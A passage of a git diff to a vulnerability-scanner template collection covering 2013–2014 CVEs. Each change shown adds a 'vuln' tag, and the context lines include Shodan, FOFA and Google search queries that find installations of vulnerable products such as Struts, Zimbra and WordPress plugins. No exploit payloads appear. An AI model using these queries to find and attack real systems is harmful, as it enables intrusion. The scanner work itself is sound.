b/http/cves/2013/CVE-2013-2248.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2013,cve,apache,redirect,struts,edb + tags: cve2013,cve,apache,redirect,struts,edb,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 1014f28ae42..1e7cd9f996d 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2013,cve,rce,struts,apache,ognl,kev,vkev + tags: cve2013,cve,rce,struts,apache,ognl,kev,vkev,vuln http: - raw: diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 3fa599a4d3e..de9c8ea6a35 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -27,7 +27,7 @@ info: vendor: "roberta_bramski" product: uploader google-query: "inurl:\"/wp-content/plugins/uploader\"" - tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive + tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index d558c4e96bd..02723cd0da6 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: telaen_project product: telaen - tags: cve2013,cve,telaen,redirect,telaen_project + tags: cve2013,cve,telaen,redirect,telaen_project,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 3f8759e7466..664674d8f2c 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -28,7 +28,7 @@ info: vendor: wptrafficanalyzer product: trafficanalyzer google-query: "inurl:\"/wp-content/plugins/trafficanalyzer\"" - tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer + tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index f0b882303eb..c32711694a5 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -32,7 +32,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve,cve2013,edb,lfi,javafaces,oracle,vkev + tags: cve,cve2013,edb,lfi,javafaces,oracle,vkev,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 238771f0bf7..52fcb0bd871 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -28,7 +28,7 @@ info: vendor: "anshul_sharma" product: "category-grid-view-gallery" google-query: "inurl:\"/wp-content/plugins/category-grid-view-gallery\"" - tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma + tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 1070675ccb2..68c01805f01 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -27,7 +27,7 @@ info: vendor: "cory_lamle" product: duplicator google-query: "inurl:\"/wp-content/plugins/duplicator\"" - tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle + tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-4982.yaml b/http/cves/2013/CVE-2013-4982.yaml index 48c05ae24e5..98ebf115a16 100644 --- a/http/cves/2013/CVE-2013-4982.yaml +++ b/http/cves/2013/CVE-2013-4982.yaml @@ -20,7 +20,7 @@ info: max-request: 1 shodan-query: title:"login" product:"Avtech" fofa-query: app="AVTECH-视频监控" - tags: cve,cve2013,avtech,verify,bypass,iot + tags: cve,cve2013,avtech,verify,bypass,iot,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 90dbe95550e..11dfc4ef7fa 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cisco product: unified_communications_manager - tags: cve2013,cve,lfi,cisco,edb + tags: cve2013,cve,lfi,cisco,edb,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 8b384a85097..282116a5fea 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: springsignage product: xibo - tags: cve2013,cve,lfi,edb,springsignage + tags: cve2013,cve,lfi,edb,springsignage,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index c7724cf973a..cac7765422e 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -31,7 +31,7 @@ info: product: dhtmlxspreadsheet framework: wordpress google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet - tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx + tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx,vuln http: - raw: diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 096fb292287..a5e828d867f 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor,vkev + tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor,vkev,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 77051332bdd..2bb63792a1a 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -28,7 +28,7 @@ info: vendor: westerndeal product: advanced_dewplayer google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" - tags: cve,cve2013,wp-plugin,lfi,edb,seclists,wordpress,westerndeal + tags: cve,cve2013,wp-plugin,lfi,edb,seclists,wordpress,westerndeal,vuln http: - method: GET diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index f78bc2dabdb..2a73ce9068a 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project + tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-100004.yaml b/http/cves/2014/CVE-2014-100004.yaml index 435761c6404..533d7c6f683 100644 --- a/http/cves/2014/CVE-2014-100004.yaml +++ b/http/cves/2014/CVE-2014-100004.yaml @@ -24,7 +24,7 @@ info: vendor: sitecore product: sitecore.net shodan-query: html:"Sitecore" - tags: cve,cve2014,xss,sitecore,cms + tags: cve,cve2014,xss,sitecore,cms,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 1d777d5ca96..be9ae6a2002 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: domphp product: domphp - tags: cve2014,cve,lfi,edb,domphp + tags: cve2014,cve,lfi,edb,domphp,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 92505b400ac..ad43578cf65 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: eyou product: eyou - tags: cve2014,cve,seclists,rce,eyou + tags: cve2014,cve,seclists,rce,eyou,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index d02d411c0e3..f6a7592336e 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -29,7 +29,7 @@ info: vendor: zte product: f460 shodan-query: cpe:"cpe:2.3:h:zte:f460" - tags: cve2014,cve,iot,zte,vkev + tags: cve2014,cve,iot,zte,vkev,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 0464d65c858..bcb80ba08e2 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -28,7 +28,7 @@ info: vendor: lighttpd product: lighttpd shodan-query: cpe:"cpe:2.3:a:lighttpd:lighttpd" - tags: cve2014,cve,lighttpd,injection,seclists,sqli + tags: cve2014,cve,lighttpd,injection,seclists,sqli,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 73b671fc6f3..3452b47d944 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -29,7 +29,7 @@ info: max-request: 11 vendor: dompdf product: dompdf - tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists,vkev + tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists,vkev,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 5981f76202e..288e9defba9 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: siemens product: simatic_s7_cpu_1200_firmware - tags: cve2014,cve,xss,siemens,edb,vkev + tags: cve2014,cve,xss,siemens,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index e46920e1ea9..7d0ee604c25 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: belkin product: n150_f9k1009_firmware - tags: cve2014,cve,lfi,router,firmware,traversal,belkin + tags: cve2014,cve,lfi,router,firmware,traversal,belkin,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index d298b99cbf9..fd45e11cfb0 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -29,7 +29,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic,vkev + tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic,vkev,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index d19daafcf62..7cbb2a5cb07 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: seagate product: blackarmor_nas_220_firmware - tags: cve2014,cve,seagate,rce,edb,vkev + tags: cve2014,cve,seagate,rce,edb,vkev,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 2b12e3589d4..e9d22e6a701 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve2014,cve,edb,drupal,sqli,vkev + tags: cve2014,cve,edb,drupal,sqli,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index cdb267bae60..9fcf9c70f4b 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -28,7 +28,7 @@ info: vendor: nodejs product: node.js shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" - tags: cve2014,cve,lfi,nodejs,st + tags: cve2014,cve,lfi,nodejs,st,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 7a4fb578310..c2691dd262c 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -35,7 +35,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss + tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 09b415202eb..ed48e9bed38 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -26,7 +26,7 @@ info: product: "activehelper_livehelp_live_chat" framework: wordpress google-query: "inurl:\"/wp-content/plugins/activehelper-livehelp\"" - tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper + tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 8ce1bbe3e9b..c8623118e49 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -27,7 +27,7 @@ info: vendor: "import_legacy_media_project" product: "import_legacy_media" framework: wordpress - tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project,vkev + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 55aba818858..85e4e5d64be 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -31,7 +31,7 @@ info: google-query: - "inurl:\"/wp-content/plugins/infusionsoft/Infusionsoft/\"" - inurl:"/wp-content/plugins/infusionsoft/infusionsoft/" - tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index bcf479ce177..76aec1a6ea8 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -27,7 +27,7 @@ info: vendor: "movies_project" product: movies framework: wordpress - tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project + tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index b64d2d8e702..ad6efb3f701 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -27,7 +27,7 @@ info: vendor: podcast_channels_project product: podcast_channels framework: wordpress - tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 73f488aa6bc..863a3dd50ee 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -27,7 +27,7 @@ info: product: ninja framework: wordpress google-query: "inurl:\"/wp-content/plugins/shortcode-ninja\"" - tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes + tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index cd0e9ff0903..fd817aa4913 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -27,7 +27,7 @@ info: vendor: cybercompany product: "swipehq-payment-gateway-woocommerce" framework: wordpress - tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 7702da491a8..9ff71cc5001 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -27,7 +27,7 @@ info: vendor: "ultimate-weather_project" product: "ultimate-weather" framework: wordpress - tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project + tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4577.yaml b/http/cves/2014/CVE-2014-4577.yaml index b2562089099..245ac2035a3 100644 --- a/http/cves/2014/CVE-2014-4577.yaml +++ b/http/cves/2014/CVE-2014-4577.yaml @@ -24,7 +24,7 @@ info: product: wp_amasin_-_the_amazon_affiliate_shop framework: wordpress publicwww-query: "/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/" - tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop + tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop,vuln flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 4fed07274d0..e71d0015aeb 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -27,7 +27,7 @@ info: product: wp-planet framework: wordpress google-query: inurl:"/wp-content/plugins/wp-planet" - tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol + tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 4e1f9c593cc..f2ac8854c0c 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -28,7 +28,7 @@ info: product: tera-charts framework: wordpress google-query: inurl:"/wp-content/plugins/tera-charts" - tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project + tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-4941.yaml b/http/cves/2014/CVE-2014-4941.yaml index e562a6395c2..e4851fb6e42 100644 --- a/http/cves/2014/CVE-2014-4941.yaml +++ b/http/cves/2014/CVE-2014-4941.yaml @@ -24,7 +24,7 @@ info: vendor: cross-rss_plugin_project product: wp-cross-rss framework: wordpress - tags: cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp + tags: cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,vuln flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index cff467d8386..0b6a151480a 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -29,7 +29,7 @@ info: vendor: levelfourdevelopment product: wp-easycart framework: wordpress - tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment + tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index f4c5332220f..0d4440ed721 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netfortris product: trixbox - tags: cve2014,cve,packetstorm,lfi,trixbox,edb,netfortris,xss + tags: cve2014,cve,packetstorm,lfi,trixbox,edb,netfortris,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-5181.yaml b/http/cves/2014/CVE-2014-5181.yaml index ac37ec40034..e2219e7a316 100644 --- a/http/cves/2014/CVE-2014-5181.yaml +++ b/http/cves/2014/CVE-2014-5181.yaml @@ -18,7 +18,7 @@ info: vendor: last.fm_rotation_plugin_project product: lastfm-rotation_plugin framework: wordpress - tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation + tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation,vuln flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-5187.yaml b/http/cves/2014/CVE-2014-5187.yaml index 3f78bce85f0..dac96830ac1 100644 --- a/http/cves/2014/CVE-2014-5187.yaml +++ b/http/cves/2014/CVE-2014-5187.yaml @@ -24,7 +24,7 @@ info: product: tom-m8te_plugin framework: wordpress publicwww-query: "/wp-content/plugins/tom-m8te/" - tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,tom-m8te + tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,tom-m8te,vuln flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index c7e473b08eb..2501e8e4bf5 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -28,7 +28,7 @@ info: vendor: webedition product: webedition_cms shodan-query: cpe:"cpe:2.3:a:webedition:webedition_cms" - tags: cve2014,cve,edb,packetstorm,lfi,webedition + tags: cve2014,cve,edb,packetstorm,lfi,webedition,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 9ae25c83a5e..0cc0f5247b6 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -29,7 +29,7 @@ info: product: wp_content_source_control framework: wordpress google-query: inurl:"/wp-content/plugins/wp-source-control" - tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project + tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 35f19ce351b..93573341e93 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -27,7 +27,7 @@ info: max-request: 8 vendor: gnu product: bash - tags: cve2014,cve,rce,shellshock,kev,gnu,vkev + tags: cve2014,cve,rce,shellshock,kev,gnu,vkev,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 4c9903ddeb8..1772e0385cb 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -31,7 +31,7 @@ info: product: http_file_server shodan-query: http.favicon.hash:2124459909 fofa-query: icon_hash=2124459909 - tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto,vkev + tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto,vkev,vuln variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index fbdc4892a18..40e523f605c 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: osclass product: osclass - tags: cve2014,cve,lfi,packetstorm,osclass + tags: cve2014,cve,lfi,packetstorm,osclass,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index cfde3d6a80c..432f4a60e51 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -30,7 +30,7 @@ info: product: soplanning shodan-query: http.html:"soplanning" fofa-query: body="soplanning" - tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss + tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 3437d869dd8..e3bbb84682b 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -34,7 +34,7 @@ info: - cpe:"cpe:2.3:a:gogs:gogs" fofa-query: title="sign in - gogs" google-query: intitle:"sign in - gogs" - tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits + tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-8739.yaml b/http/cves/2014/CVE-2014-8739.yaml index 66d10ca3699..564369e939f 100644 --- a/http/cves/2014/CVE-2014-8739.yaml +++ b/http/cves/2014/CVE-2014-8739.yaml @@ -27,7 +27,7 @@ info: product: creative_contact_form framework: wordpress publicwww-query: "/wp-content/plugins/sexy-contact-form/" - tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce,vkev + tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index ffbbeaad48b..3cf206f2e5b 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -29,7 +29,7 @@ info: product: dukapress framework: wordpress google-query: inurl:"/wp-content/plugins/dukapress" - tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress + tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index af31c0f201b..74277d64e0d 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -29,7 +29,7 @@ info: product: "video_gallery" framework: wordpress google-query: "inurl:\"/wp-content/plugins/dzs-videogallery\"" - tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio + tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 7055a00572f..b9536dcd9ea 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -29,7 +29,7 @@ info: vendor: db_backup_project product: db_backup framework: wordpress - tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project + tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 2ea7b831ad0..f56c051c7dc 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -29,7 +29,7 @@ info: - http.html:"eleanor" - cpe:"cpe:2.3:a:eleanor-cms:eleanor_cms" fofa-query: body="eleanor" - tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms + tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 53f48b0a410..eaf0d5ca682 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -27,7 +27,7 @@ info: vendor: frontend_uploader_project product: frontend_uploader framework: wordpress - tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project + tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml 